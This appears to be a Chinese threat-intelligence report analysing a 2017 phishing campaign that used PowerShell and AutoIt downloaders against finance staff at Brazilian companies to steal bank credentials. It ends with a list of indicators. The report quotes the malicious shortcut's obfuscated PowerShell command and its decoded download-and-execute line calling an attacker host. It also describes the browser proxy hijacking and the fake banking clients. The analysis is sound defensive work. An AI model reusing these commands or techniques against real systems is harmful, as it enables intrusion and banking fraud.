【技术分享】针对巴西商业公司财务的攻击事件分析

阅读量135214

|

发布时间 : 2017-09-28 15:28:01

t01f788c6b2ba9abc2f.png


1. 概述

9月14日到9月20(特别是9月19、20日两天),360威胁情报中心发现一批具有相似特征的钓鱼邮件,这些钓鱼邮件的语言均为葡萄牙语,投递目标为巴西的商业公司,使用的payload主要为powershellAutoIt编写,这引起了我们分析人员的注意。经过分析,确定这是一起针对巴西境内商业公司财务人员的定向攻击,攻击目标为盗取银行账户。


2. 目标

a.    葡萄牙语

b.    巴西商业公司的人力资源、财务人员

c.    邮件内容通常如下:

https://p3.ssl.qhimg.com/t01de562d2bb7b6ca2d.png

翻译:

亲爱的先生 确定你没有收到我的第一封电子邮件,我会按照约定寄给你我的简历。 所需的其他信息包含在附件课程的第二张表中。

https://p4.ssl.qhimg.com/t01497c5ddeec4568d4.png

翻译:

此消息是指服务提供商的电子服务税务说明   -  NFS-e号51523245:
公司名称:PAYPAL DO   BRASIL SERVICOS DE PAGAMENTOS LTDA
电子信箱:notificacoes@paypal.com
CCM:3,932,128-2
CNPJ:10,878,448 / 0001-66
 
我们建议您在Million Note   System中注册一个安全短语,将出现在发送给您的所有消息中。
 
安全短语保证该消息由圣保罗市发送,并阻止收件人打开可能包含计算机病毒的邮件。
 
附上是发票nf = 51523245&cod = MIJ6BFFP
……

3. 分析

将邮件中的附件解压后,是一个html的快捷方式,该快捷方式的链接目标如下,双击快捷方式后,会以base64编码后的恶意代码作为参数启动powershell.exe执行,然后再启动iexplore.exe迷惑受害人。

C:windowssystem32cmd.exe /V /C   "set mq=hell ^-e^n^c &&set wx=pOwErs&&start !wx!!mq! bwB1AHUAOwBpAEUAeAAoAE4AZQBXAC0AbwBCAEoAZQBDAHQAIABOAEUAdAAuAFcAZQBiAEMAbABJAEUATgB0ACkALgBEAE8AdwBuAEwATwBBAEQAcwB0AFIASQBuAEcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxADMANQAzADEANwA5ADIALgByAC4AcwAtAGMAZABuAC4AbgBlAHQALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBEAG8AdgBMAHoAawB4AE0AegBVAHoATQBUAGMANQBNAGkANQB5AEwAbgBNAHQAWQAyAFIAdQBMAG0ANQBsAGQAQwA5ADIATQBuAHgAdwBWAEUAcABaACcAKQA="-%ProgramFiles%Internet
Exploreriexplore.exe

解码后

iEx(NeW-oBJeCt   NEt.WebClIENt).DOwnLOADstRInG('http://913531792.r.s-cdn.net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ')

Powershell启动后,会从hxxp://913531792[.]r.s-cdn[.]net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ下载一段代码,如下:

https://p1.ssl.qhimg.com/t019a7a6de5a5f0aac9.png

可以看见这段代码的功能很简单,从hxxp://913531792[.]r.s-cdn[.]net/v2/gd.php下载并异或0x6A解密出一个名为Loader的dll,然后将其加载,接着通过Loader的Go方法(参数为"hxxp://913531792[.]r.s-cdn[.]net/v2","pTJY")开始下一步流程,最后生成一个vbs脚本用于启动Loader中指定的文件,并生成指向该vbs脚本的快捷方式,打开快捷方式启动vbs脚本。

由于Loader中下载的文件已经无法下载,而我们目前只知道该样本是一个downloader,更具体的恶意行为无法获得,也就不能确定攻击者的最终目的,通常的分析到这里就只能终止了。应付这种情况的一个常用方法是寻找同源样本,无论是历史样本还是更新的存活样本,都能够对样本的行为进行有效的还原,而且在寻找同源样本时获取的其他信息也能进一步对攻击者的画像进行勾勒。

通过360威胁情报中心(ti.360.net)搜索913531792.r.s-cdn.net,我们找到了更多的样本,以及该域名曾解析到的ip地址46.231.178.38、87.238.165.100、46.231.178.51、37.220.34.247等信息。

https://p0.ssl.qhimg.com/t01b5e5856ec1a28d94.png

进一步搜索这些IP地址的信息,发现另一个作为C&C的域名hictip.r.worldssl.net及其关联样本:

https://p3.ssl.qhimg.com/t0158e8bcf8153497e0.png

其中有一个MD5为b5ef9c4c82b2bef4743b30481232ecc8的AutoIt样本,对其的分析让我们得到了更多的结果。该样本会从hxxps://github[.]com/fl20177/Flash/raw/Update/fl.exe下载一个文件,然后访问hxxp://94[.]229.78.156/cd/controller.php。下载回来的fl.exe也是一个AutoIt编译成PE的可执行程序,其反编译后的代码正是前面提到过的powershell调用代码。

https://p5.ssl.qhimg.com/t016873707ce87f7223.png

https://p2.ssl.qhimg.com/t0198e61886d83c5154.png

那么现在我们得到了关于攻击者的一些新的信息,一个github地址和一个ip:

hxxps://github[.]com/fl20177

94[.]229.78.156

访问攻击者在Github上的账号https://github.com/fl20177,可以发现这个账号是攻击者特地为这次攻击注册的,在9月5日注册。

https://p2.ssl.qhimg.com/t01152413a64a9666cb.png

接着发现其github上的项目https://github.com/fl20177/Flash 中还有一个新的样本:zer.exe。下载回来反编译后如下,注释部分是对代码功能的说明:

https://p1.ssl.qhimg.com/t01549b0ce75aff83c4.png

该样本首先修改注册表项修改HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL,这个注册表项对应的是IE的自动代理配置,可以指定一个脚本让IE对符合条件的域名使用指定的代理。这里的指定的代理配置脚本为hxxp://www[.]vijfheerenlandendigitaal.nl/ec/tfiles.txt, 内容如下,其指定了当访问桑坦德银行、巴西布拉德斯科银行、花旗银行、巴西联邦储蓄银行等网址时,使用代理服务器94.229.78.156,攻击者获取到受害者的访问流量后,可以返回伪造的钓鱼页面获取受害者的银行账号密码。

https://p4.ssl.qhimg.com/t01eef4fa340ddd3f3b.png

http://p5.qhimg.com/t016d7492a7ba5f9718.png

同时,样本还从hxxps://www[.]yourlifeinthesun.com/manifest.zip下载一个chrome的扩展插件,并替换掉chrome的快捷方式,为其加上“–load-extension=”的启动参数,让chrome启动时默认加载这个插件,插件主要作用是当受害人用chrome访问上面提到的银行网址时,禁用掉使其不可访问,从而诱导受害人使用IE浏览器进行访问。

https://p0.ssl.qhimg.com/t01ffcd7fe76ed535bd.png

而且样本还会下载并替换掉Aplicativo Bradesco.exe(巴西布拉德斯科银行的PC客户端软件)、itauaplicativo.exe(巴西伊塔乌投资银行的PC客户端软件),替换后的软件点击后只会弹出窗口提示:“系统不可用,请通过浏览器登录您的帐号。”,这也是一种诱导受害人通过浏览器登录银行账号的手段。

t014b3da135d542fc3f.png

综上所述,360威胁情报中心认为此次事件其攻击目标为巴西的商业公司财务人员,目的为盗取目标银行账号密码,是一起限定范围内的定向攻击事件,而不是针对特定行业人员以窃取资料为目的的APT事件。


4. IOC

Domain

913531792.r.s-cdn.net

hictip.r.worldssl.net

www.yourlifeinthesun.com

IP

94.229.78.156

URL

http://913531792.r.s-cdn.net/v2

http://913531792.r.s-cdn.net/v2/gd.php

http://913531792.r.s-cdn.net/v2/gl.php

https://hictip.r.worldssl.net/v2

https://hictip.r.worldssl.net/v2/gl.php

https://hictip.r.worldssl.net/v2/gd.php

http://www.vijfheerenlandendigitaal.nl/ec/tfiles.txt

http://94.229.78.156/cc/controller.php

http://94.229.78.156/cd/controller.php

https://www.yourlifeinthesun.com/itauaplicativo.exe

https://www.yourlifeinthesun.com/DevWarningPatch.bat

https://www.yourlifeinthesun.com/manifest.zip

https://www.yourlifeinthesun.com/AplicativoBradesco.exe

https://github.com/fl20177/Flash/raw/Update/fl.exe

MD5

5b9e5e272d4e56b84f83c916c7eefb8f

4f48f618fc3247d1c013562a2e34dc4e

5dc7429d915289b58880721a7d1dc35c

b6153ed6c5ecac7fc38c7316057f5dd5

7b7f18f8ec641ce0930a75071cae0a8f

本文由奇安信威胁情报中心原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/86947

安全客 - 有思想的安全新媒体

分享到:微信
+10赞
收藏
奇安信威胁情报中心
分享到:微信

发表评论

内容需知
  • 投稿须知
  • 转载须知
  • 官网QQ群8:819797106
  • 官网QQ群3:830462644(已满)
  • 官网QQ群2:814450983(已满)
  • 官网QQ群1:702511263(已满)
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66